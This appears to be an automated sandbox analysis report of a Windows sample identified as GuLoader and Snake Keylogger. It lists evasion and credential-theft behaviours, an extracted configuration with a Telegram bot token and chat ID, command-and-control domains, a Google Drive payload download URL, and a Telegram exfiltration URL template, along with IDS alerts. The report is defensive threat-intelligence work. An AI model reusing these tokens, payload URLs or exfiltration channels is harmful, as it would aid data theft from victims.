Edit tour

Windows Analysis Report
pkNnK2ya0f.exe

Overview

General Information

Sample name:	pkNnK2ya0f.exe renamed because original name is a hash value
Original sample name:	94e73ce7a276e8cc7b49c231a817a7f4c87e988b3ced91e56f452907e789687a.exe
Analysis ID:	1632194
MD5:	a74d40a1da1722480a78d0794fb6ce9d
SHA1:	d484f36484580a3aaf3aadf0343c464880bab4ca
SHA256:	94e73ce7a276e8cc7b49c231a817a7f4c87e988b3ced91e56f452907e789687a
Tags:	exeGuLoadersigneduser-adrian__luca
Infos:

Detection

GuLoader, Snake Keylogger

Score:	100
Range:	0 - 100
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Found malware configuration

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected GuLoader

Yara detected Snake Keylogger

Yara detected Telegram RAT

AI detected suspicious PE digital signature

Joe Sandbox ML detected suspicious sample

Switches to a custom stack to bypass stack traces

Tries to detect the country of the analysis system (by using the IP)

Tries to detect virtualization through RDTSC time measurements

Tries to harvest and steal browser information (history, passwords, etc)

Tries to steal Mail credentials (via file / registry access)

Uses the Telegram API (likely for C&C communication)

Allocates memory with a write watch (potentially for evading sandboxes)

Contains functionality for read data from the clipboard

Contains functionality to dynamically determine API calls

Contains functionality to shutdown / reboot the system

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Detected potential crypto function

Drops PE files

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Found inlined nop instructions (likely shell or obfuscated code)

Found large amount of non-executed APIs

Found potential string decryption / allocating functions

HTTP GET or POST without a user agent

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check the online IP address of the machine

May sleep (evasive loops) to hinder dynamic analysis

PE / OLE file has an invalid certificate

Queries the volume information (name, serial number etc) of a device

Sample file is different than original file name gathered from version info

Suricata IDS alerts with low severity for network traffic

Uses 32bit PE files

Uses Microsoft's Enhanced Cryptographic Provider

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Uses insecure TLS / SSL version for HTTPS connection

Yara detected Credential Stealer

Classification

Process Tree

System is w10x64

pkNnK2ya0f.exe (PID: 6816 cmdline: "C:\Users\user\Desktop\pkNnK2ya0f.exe" MD5: A74D40A1DA1722480A78D0794FB6CE9D)

pkNnK2ya0f.exe (PID: 6252 cmdline: "C:\Users\user\Desktop\pkNnK2ya0f.exe" MD5: A74D40A1DA1722480A78D0794FB6CE9D)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
CloudEyE, GuLoader	CloudEyE (initially named GuLoader) is a small VB5/6 downloader. It typically downloads RATs/Stealers, such as Agent Tesla, Arkei/Vidar, Formbook, Lokibot, Netwire and Remcos, often but not always from Google Drive. The downloaded payload is xored.	No Attribution	http://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bluebottle-banks-targeted-africa https://0x00sec.org/t/analyzing-modern-malware-techniques-part-3/18943 https://any.run/cybersecurity-blog/deobfuscating-guloader/ https://asec.ahnlab.com/en/55978/ https://blog.checkpoint.com/security/march-2023s-most-wanted-malware-new-emotet-campaign-bypasses-microsoft-blocks-to-distribute-malicious-onenote-files/	https://malpedia.caad.fkie.fraunhofer.de/details/win.cloudeye

Name	Description	Attribution	Blogpost URLs	Link
404 Keylogger, Snake Keylogger	Snake Keylogger (aka 404 Keylogger) is a subscription-based keylogger that has many capabilities. The infostealer can steal a victims sensitive information, log keyboard strokes, take screenshots and extract information from the system clipboard. It was initially released on a Russian hacking forum in August 2019. It is notable for its relatively unusual methods of data exfiltration, including via email, FTP, SMTP, Pastebin or the messaging app Telegram.	No Attribution	https://any.run/cybersecurity-blog/analyzing-snake-keylogger/ https://any.run/cybersecurity-blog/reverse-engineering-snake-keylogger/ https://blog.netlab.360.com/purecrypter https://blog.nviso.eu/2022/04/06/analyzing-a-multilayer-maldoc-a-beginners-guide/ https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord	https://malpedia.caad.fkie.fraunhofer.de/details/win.404keylogger

Malware Configuration

Threatname: Snake Keylogger

{"Exfil Mode": "Telegram", "Token": "8001354238:AAGn34Kjnx6tMx7mYU1z9kHME3Ora_fTuPc", "Chat_id": "5100996224", "Version": "4.4"}

Yara Signatures

Memory Dumps

Source	Rule	Description	Author
00000009.00000002.2360425688.00000000367C1000.00000004.00000800.00020000.00000000.sdmp	JoeSecurity_SnakeKeylogger	Yara detected Snake Keylogger	Joe Security
00000000.00000002.1521492912.00000000075A4000.00000040.00001000.00020000.00000000.sdmp	JoeSecurity_GuLoader_2	Yara detected GuLoader	Joe Security
Process Memory Space: pkNnK2ya0f.exe PID: 6252	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Process Memory Space: pkNnK2ya0f.exe PID: 6252	JoeSecurity_TelegramRAT	Yara detected Telegram RAT	Joe Security

Suricata Signatures

ETPRO MALWARE Common Downloader Header Pattern H

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T20:44:18.729650+0100	2803305	3	Unknown Traffic	192.168.2.10	49693	104.21.32.1	443	TCP

ETPRO MALWARE Common Downloader Header Pattern UH

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T20:44:12.095316+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49691	132.226.247.73	80	TCP
2025-03-07T20:44:16.486047+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49691	132.226.247.73	80	TCP
2025-03-07T20:44:19.501723+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49694	132.226.247.73	80	TCP
2025-03-07T20:44:22.470460+0100	2803274	2	Potentially Bad Traffic	192.168.2.10	49696	132.226.247.73	80	TCP

ETPRO MALWARE Common Downloader Header Pattern UHCa

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T20:44:04.862004+0100	2803270	2	Potentially Bad Traffic	192.168.2.10	49689	172.217.16.142	443	TCP

Joe Security ANOMALY Telegram Send Message

Timestamp	SID	Severity	Classtype	Source IP	Source Port	Destination IP	Destination Port	Protocol
2025-03-07T20:44:44.057803+0100	1810007	1	Potentially Bad Traffic	192.168.2.10	49708	149.154.167.220	443	TCP

HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Date: Fri, 07 Mar 2025 19:44:43 GMTContent-Type: application/jsonContent-Length: 55Connection: closeStrict-Transport-Security: max-age=31536000; includeSubDomains; preloadAccess-Control-Allow-Origin: *Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection

Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000367C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://aborters.duckdns.org:8081
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000367C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://anotherarmy.dns.army:8081
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000367C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000367C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://checkip.dyndns.org/
Source: pkNnK2ya0f.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000367C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000367C1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://varders.kozow.com:8081
Source: pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ac.ecosia.org?q=
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000368A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000368A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000368A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000368A4000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://api.telegram.org/bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:928100%0D%0ADate%20a
Source: pkNnK2ya0f.exe, 00000009.00000003.1628266026.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1628201100.00000000062FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://apis.google.com
Source: pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
Source: pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036935000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036967000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036926000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036935000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=en4
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036930000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=enlBwq
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036926000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://chrome.google.com/webstore?hl=ent2
Source: pkNnK2ya0f.exe, 00000009.00000002.2340613005.0000000006288000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/
Source: pkNnK2ya0f.exe, 00000009.00000002.2340613005.00000000062C2000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2340869862.0000000007C50000.00000004.00001000.00020000.00000000.sdmp	String found in binary or memory: https://drive.google.com/uc?export=download&id=1p-SJOY1qwmYPiU11hAoSaIe4Bw5Stu89
Source: pkNnK2ya0f.exe, 00000009.00000003.1685598823.00000000062F6000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1647286975.00000000062F9000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1685552231.00000000062EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usM
Source: pkNnK2ya0f.exe, 00000009.00000002.2340613005.00000000062F0000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1685598823.00000000062F6000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1647286975.00000000062F9000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1685552231.00000000062EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/
Source: pkNnK2ya0f.exe, 00000009.00000002.2340613005.00000000062F0000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1685598823.00000000062F6000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1647286975.00000000062F9000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1685552231.00000000062EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/Y
Source: pkNnK2ya0f.exe, 00000009.00000003.1685598823.00000000062F6000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1647286975.00000000062F9000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1628266026.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1685552231.00000000062EB000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1628201100.00000000062FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1p-SJOY1qwmYPiU11hAoSaIe4Bw5Stu89&export=download
Source: pkNnK2ya0f.exe, 00000009.00000002.2340613005.00000000062C2000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1p-SJOY1qwmYPiU11hAoSaIe4Bw5Stu89&export=download-
Source: pkNnK2ya0f.exe, 00000009.00000002.2340613005.00000000062DD000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1p-SJOY1qwmYPiU11hAoSaIe4Bw5Stu89&export=download9
Source: pkNnK2ya0f.exe, 00000009.00000003.1685598823.00000000062F6000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1647286975.00000000062F9000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1685552231.00000000062EB000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://drive.usercontent.google.com/download?id=1p-SJOY1qwmYPiU11hAoSaIe4Bw5Stu89&export=downloade
Source: pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/chrome_newtabv20
Source: pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://gemini.google.com/app?q=
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.000000003680C000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000368A4000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.000000003687C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.000000003680C000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.00000000368A4000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.000000003687C000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036837000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://reallyfreegeoip.org/xml/8.46.123.189$
Source: pkNnK2ya0f.exe, 00000009.00000003.1628266026.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1628201100.00000000062FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://ssl.gstatic.com
Source: pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.ecosia.org/newtab/v20
Source: pkNnK2ya0f.exe, 00000009.00000003.1628266026.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1628201100.00000000062FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google-analytics.com;report-uri
Source: pkNnK2ya0f.exe, 00000009.00000003.1628266026.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1628201100.00000000062FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com
Source: pkNnK2ya0f.exe, 00000009.00000002.2361633227.0000000037AD2000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_alldp.ico
Source: pkNnK2ya0f.exe, 00000009.00000003.1628266026.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1628201100.00000000062FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.googletagmanager.com
Source: pkNnK2ya0f.exe, 00000009.00000003.1628266026.00000000062FA000.00000004.00000020.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000003.1628201100.00000000062FA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://www.gstatic.com
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036967000.00000004.00000800.00020000.00000000.sdmp, pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036958000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036967000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/4
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036962000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/lBwq
Source: pkNnK2ya0f.exe, 00000009.00000002.2360425688.0000000036958000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://www.office.com/t2

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49689
Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49699 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49695 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49697 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49693 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49690 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49701 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49699
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49697
Source: unknown	Network traffic detected: HTTP traffic on port 49707 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49695
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49693
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49692
Source: unknown	Network traffic detected: HTTP traffic on port 49692 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49703 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49690
Source: unknown	Network traffic detected: HTTP traffic on port 49689 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49707
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49703
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49701

Source: unknown	HTTPS traffic detected: 172.217.16.142:443 -> 192.168.2.10:49689 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.217.18.97:443 -> 192.168.2.10:49690 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 149.154.167.220:443 -> 192.168.2.10:49708 version: TLS 1.2

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe

Code function: 0_2_00405425 GetDlgItem,GetDlgItem,GetDlgItem,GetDlgItem,GetClientRect,GetSystemMetrics,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,ShowWindow,ShowWindow,GetDlgItem,SendMessageW,SendMessageW,SendMessageW,GetDlgItem,CreateThread,CloseHandle,ShowWindow,ShowWindow,ShowWindow,ShowWindow,SendMessageW,CreatePopupMenu,AppendMenuW,GetWindowRect,TrackPopupMenu,SendMessageW,OpenClipboard,EmptyClipboard,GlobalAlloc,GlobalLock,SendMessageW,GlobalUnlock,SetClipboardData,CloseClipboard,

0_2_00405425

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 0_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		0_2_00403373
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_00403373 EntryPoint,SetErrorMode,GetVersion,lstrlenA,#17,OleInitialize,SHGetFileInfoW,GetCommandLineW,GetModuleHandleW,CharNextW,GetTempPathW,GetTempPathW,GetWindowsDirectoryW,lstrcatW,GetTempPathW,lstrcatW,SetEnvironmentVariableW,SetEnvironmentVariableW,SetEnvironmentVariableW,DeleteFileW,OleUninitialize,ExitProcess,lstrcatW,lstrcatW,lstrcatW,lstrcmpiW,SetCurrentDirectoryW,DeleteFileW,CopyFileW,CloseHandle,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,ExitWindowsEx,ExitProcess,		9_2_00403373

Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 0_2_00404C62	0_2_00404C62
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 0_2_00406ADD	0_2_00406ADD
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 0_2_004072B4	0_2_004072B4
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_00404C62	9_2_00404C62
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_00406ADD	9_2_00406ADD
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_004072B4	9_2_004072B4
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F1C468	9_2_05F1C468
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F1C738	9_2_05F1C738
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F1C146	9_2_05F1C146
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F17118	9_2_05F17118
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F1A088	9_2_05F1A088
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F15370	9_2_05F15370
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F1D278	9_2_05F1D278
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F1CCD8	9_2_05F1CCD8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F1CFA9	9_2_05F1CFA9
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F169A0	9_2_05F169A0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F1E988	9_2_05F1E988
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F1CA08	9_2_05F1CA08
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F13E09	9_2_05F13E09
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F129EC	9_2_05F129EC
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F1E97A	9_2_05F1E97A
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F1F960	9_2_05F1F960
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_05F13A89	9_2_05F13A89
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_060672F0	9_2_060672F0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_0606324C	9_2_0606324C
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_06066058	9_2_06066058
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_0606CF58	9_2_0606CF58
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E5150	9_2_397E5150
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397ECDF0	9_2_397ECDF0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EE9B8	9_2_397EE9B8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E1C58	9_2_397E1C58
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E23B0	9_2_397E23B0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E9670	9_2_397E9670
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E2A98	9_2_397E2A98
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EE560	9_2_397EE560
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EE550	9_2_397EE550
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E9D40	9_2_397E9D40
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E5140	9_2_397E5140
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397ECDE0	9_2_397ECDE0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397ECDCC	9_2_397ECDCC
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EE9A9	9_2_397EE9A9
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E9450	9_2_397E9450
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E1C49	9_2_397E1C49
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E0040	9_2_397E0040
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EDC38	9_2_397EDC38
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EDC29	9_2_397EDC29
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E0023	9_2_397E0023
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E8CC8	9_2_397E8CC8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EE0B8	9_2_397EE0B8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E8CB9	9_2_397E8CB9
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EE09E	9_2_397EE09E
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E0B30	9_2_397E0B30
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397ED730	9_2_397ED730
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E0B20	9_2_397E0B20
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397ED7E0	9_2_397ED7E0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397E23A0	9_2_397E23A0
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EEE38	9_2_397EEE38
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EEE37	9_2_397EEE37
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EEE29	9_2_397EEE29
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EEE0C	9_2_397EEE0C
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397ED2E8	9_2_397ED2E8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EF6E8	9_2_397EF6E8
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397ED2E7	9_2_397ED2E7
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EF6DC	9_2_397EF6DC
Source: C:\Users\user\Desktop\pkNnK2ya0f.exe	Code function: 9_2_397EF290	9_2_397EF290
